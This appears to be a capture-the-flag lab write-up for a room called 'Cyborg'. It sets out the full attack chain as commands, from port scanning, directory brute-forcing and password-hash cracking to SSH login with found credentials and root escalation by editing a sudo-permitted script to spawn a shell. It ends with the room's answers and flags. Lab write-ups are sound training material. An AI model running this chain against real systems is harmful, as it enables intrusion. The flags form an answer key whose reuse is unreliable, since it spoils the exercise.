Cyborg
sudo openvpn WittyAle.ovpnping
ping 10.10.181.155rustscan
rustscan -a 10.10.181.155 --ulimit 5000 -b 65535 -- -A gobuster
gobuster dir --url http://10.10.181.155 -w /usr/share/wordlists/dirb/common.txt -t 30 -k -x py,html,txt==/admin , /etc==
10.10.181.155/etc/squid/passwd
music_archive:$apr1$BpZ.Q.1m$F0qqPwHSOG50URuOVQTTn.
john
john --wordlist=/usr/share/wordlists/rockyou.txt passwd john passwd --show ==cracked -> music_archive:squidward==
10.10.181.155/admin/admin.html download -> archive.tar
Borg Backup
tar -xf archive.tartree homecd cyborg/home/field/devborg list final_archive ==passphrase: squidward==
borg list final_archive::music_archiveborg extract final_archive::music_archivecat home/alex/Desktop/secret.txtshoutout to all the people who have gotten to this stage whoop whoop!"
cat home/alex/Documents/note.txt Wow I'm awful at remembering Passwords so I've taken my Friends advice and noting them down!
alex:S3cretP@s3
ssh
ssh alex@10.10.181.155priv esc
sudo -l==(ALL : ALL) NOPASSWD: /etc/mp3backups/backup.sh==
chmod 777 /etc/mp3backups/backup.shnano /etc/mp3backups/backup.shadd #2 line -> sudo /bin/bash
sudo /etc/mp3backups/backup.sh Scan the machine, how many ports are open? 2
What service is running on port 22? ssh
What service is running on port 80? http
What is the user.txt flag? flag{1_hop3_y0u_ke3p_th3_arch1v3s_saf3}
What is the root.txt flag? flag{Than5s_f0r_play1ng_H0p£_y0u_enJ053d}
[[Blaster]]
Last updated
Was this helpful?